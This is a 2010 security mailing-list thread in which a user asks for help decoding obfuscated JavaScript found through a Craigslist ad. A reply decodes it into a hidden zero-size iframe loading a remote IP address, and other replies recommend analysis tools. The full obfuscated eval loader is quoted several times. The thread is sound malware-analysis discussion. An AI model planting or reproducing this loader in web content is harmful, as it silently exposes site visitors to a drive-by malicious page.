I like using jsunpack for decodes myself... and looking over the recent submissions can give you some ideas of the depth at which some obfuscation goes to. http://jsunpack.jeek.org/dec/go
On Wed, Apr 7, 2010 at 11:05 AM, Rhonda Kreklau <[email protected]> wrote: > Thanks to all those that replied. > > I googled malware analysis last night and ran the url through Anubis > and Wepawet. Anubis indicated some traffic, but I didn't see much else > on their report. While Wepawet was waiting to process, I had to leave > for class and rebooted my library PC. Google had not picked this up as > a malicious link at that point in time. I'll look into Malzilla next > time. > > Thanks again all. > > Regards, > > Rhonda > > On Wed, Apr 7, 2010 at 6:48 AM, Chris Blazek <[email protected]> wrote: >> malzilla works wonders: >> >> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2C48%2C49%2C46%2C50%2C51%2C53%2C46%2C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); >> >> 1st Pass: >> document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,50,48,49,46,50,51,53,46,50,51,53,46,49,55,52,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62)); >> >> 2nd Pass: >> <iframe src="hxxp://201.235.235.174/index.php" width="0" >> height="0"></iframe> >> >> I wouldn't pull up the iframe src. I didn't delve into what it was actually >> doing but the IP is an Argentina cable provider. >> >> >> >> >> On Tue, Apr 6, 2010 at 9:11 PM, Rhonda Kreklau <[email protected]> >> wrote: >>> >>> I found this by following a Craigslist ad asking for redesign job on a >>> website...can someone decode it for me... >>> >>> >>> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2C48%2C49%2C46%2C50%2C51%2C53%2C46%2C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); >>> >>> Thanks >>> >>> Rhonda >>> _______________________________________________ >>> Pauldotcom mailing list >>> [email protected] >>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >>> Main Web Site: http://pauldotcom.com >> >> >> >> -- >> http://www.kingbin.net/ >> >> _______________________________________________ >> Pauldotcom mailing list >> [email protected] >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com >> > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
